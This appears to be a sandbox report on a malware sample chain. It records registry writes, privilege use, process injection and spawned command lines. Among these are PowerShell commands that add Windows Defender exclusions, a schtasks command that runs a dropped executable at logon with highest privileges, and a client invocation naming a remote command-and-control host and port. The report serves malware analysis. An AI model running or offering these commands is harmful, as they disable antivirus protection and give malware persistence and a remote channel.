Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\CatRoot\$SXR\$SXR.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\CatRoot\$SXR\$SXR.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4192 wrote to memory of 1240 N/A C:\Users\Admin\AppData\Local\Temp\custom1.exe C:\Users\Admin\AppData\Local\Temp\Client.exe
PID 4192 wrote to memory of 1240 N/A C:\Users\Admin\AppData\Local\Temp\custom1.exe C:\Users\Admin\AppData\Local\Temp\Client.exe
PID 4192 wrote to memory of 1240 N/A C:\Users\Admin\AppData\Local\Temp\custom1.exe C:\Users\Admin\AppData\Local\Temp\Client.exe
PID 4192 wrote to memory of 1840 N/A C:\Users\Admin\AppData\Local\Temp\custom1.exe C:\Users\Admin\AppData\Local\Temp\switched.exe
PID 4192 wrote to memory of 1840 N/A C:\Users\Admin\AppData\Local\Temp\custom1.exe C:\Users\Admin\AppData\Local\Temp\switched.exe
PID 4192 wrote to memory of 1840 N/A C:\Users\Admin\AppData\Local\Temp\custom1.exe C:\Users\Admin\AppData\Local\Temp\switched.exe
PID 1840 wrote to memory of 4624 N/A C:\Users\Admin\AppData\Local\Temp\switched.exe C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
PID 1840 wrote to memory of 4624 N/A C:\Users\Admin\AppData\Local\Temp\switched.exe C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
PID 4624 wrote to memory of 3884 N/A C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe C:\Windows\system32\cmd.exe
PID 4624 wrote to memory of 3884 N/A C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe C:\Windows\system32\cmd.exe
PID 1840 wrote to memory of 992 N/A C:\Users\Admin\AppData\Local\Temp\switched.exe C:\Users\Admin\AppData\Local\Temp\tesetey.exe
PID 1840 wrote to memory of 992 N/A C:\Users\Admin\AppData\Local\Temp\switched.exe C:\Users\Admin\AppData\Local\Temp\tesetey.exe
PID 1840 wrote to memory of 992 N/A C:\Users\Admin\AppData\Local\Temp\switched.exe C:\Users\Admin\AppData\Local\Temp\tesetey.exe
PID 3884 wrote to memory of 4616 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 3884 wrote to memory of 4616 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 3884 wrote to memory of 1604 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 3884 wrote to memory of 1604 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 3884 wrote to memory of 2356 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 3884 wrote to memory of 2356 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 992 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 992 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 992 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 1944 wrote to memory of 3704 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1944 wrote to memory of 3704 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1944 wrote to memory of 3704 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 992 wrote to memory of 4280 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\explorer.exe
PID 992 wrote to memory of 4280 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\explorer.exe
PID 992 wrote to memory of 844 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 992 wrote to memory of 844 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 992 wrote to memory of 844 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 992 wrote to memory of 844 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 992 wrote to memory of 844 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 992 wrote to memory of 844 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 992 wrote to memory of 844 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 992 wrote to memory of 844 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 992 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\SysWOW64\cmd.exe
PID 992 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\SysWOW64\cmd.exe
PID 992 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\SysWOW64\cmd.exe
PID 844 wrote to memory of 1328 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\SysWOW64\cmd.exe
PID 844 wrote to memory of 1328 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\SysWOW64\cmd.exe
PID 844 wrote to memory of 1328 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\SysWOW64\cmd.exe
PID 844 wrote to memory of 2888 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\SysWOW64\cmd.exe
PID 844 wrote to memory of 2888 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\SysWOW64\cmd.exe
PID 844 wrote to memory of 2888 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 3400 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\YourPhone.exe
PID 3008 wrote to memory of 3400 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\YourPhone.exe
PID 1328 wrote to memory of 3944 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1328 wrote to memory of 3944 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1328 wrote to memory of 3944 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2888 wrote to memory of 2172 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2888 wrote to memory of 2172 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2888 wrote to memory of 2172 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1240 wrote to memory of 2064 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SysWOW64\cmd.exe
PID 1240 wrote to memory of 2064 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SysWOW64\cmd.exe
PID 1240 wrote to memory of 2064 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SysWOW64\cmd.exe
PID 1240 wrote to memory of 4136 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SysWOW64\cmd.exe
PID 1240 wrote to memory of 4136 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SysWOW64\cmd.exe
PID 1240 wrote to memory of 4136 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SysWOW64\cmd.exe
PID 2064 wrote to memory of 1892 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2064 wrote to memory of 1892 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2064 wrote to memory of 1892 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4136 wrote to memory of 4616 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4136 wrote to memory of 4616 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4136 wrote to memory of 4616 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe

Processes

C:\Users\Admin\AppData\Local\Temp\custom1.exe

"C:\Users\Admin\AppData\Local\Temp\custom1.exe"

C:\Users\Admin\AppData\Local\Temp\Client.exe

"C:\Users\Admin\AppData\Local\Temp\Client.exe"

C:\Users\Admin\AppData\Local\Temp\switched.exe

"C:\Users\Admin\AppData\Local\Temp\switched.exe"

C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe

"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"

C:\Users\Admin\AppData\Local\Temp\tesetey.exe

"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"

C:\Windows\system32\certutil.exe

certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5

C:\Windows\system32\find.exe

find /i /v "md5"

C:\Windows\system32\find.exe

find /i /v "certutil"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2vvhbn10\2vvhbn10.cmdline"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5488.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC6FB58647E86F4633B75AC84240E5CCD1.TMP"

C:\Windows\explorer.exe

"C:\Windows\explorer.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k start /b C:\Users\Admin\AppData\Local\Temp\YourPhone.exe & exit

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit

C:\Users\Admin\AppData\Local\Temp\YourPhone.exe

C:\Users\Admin\AppData\Local\Temp\YourPhone.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$SXR" /tr '"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"' & exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp68CC.tmp.bat""

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "$SXR" /tr '"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"'

C:\Windows\SysWOW64\timeout.exe

timeout 3

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\System32\CatRoot\$SXR\$SXR.exe

"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

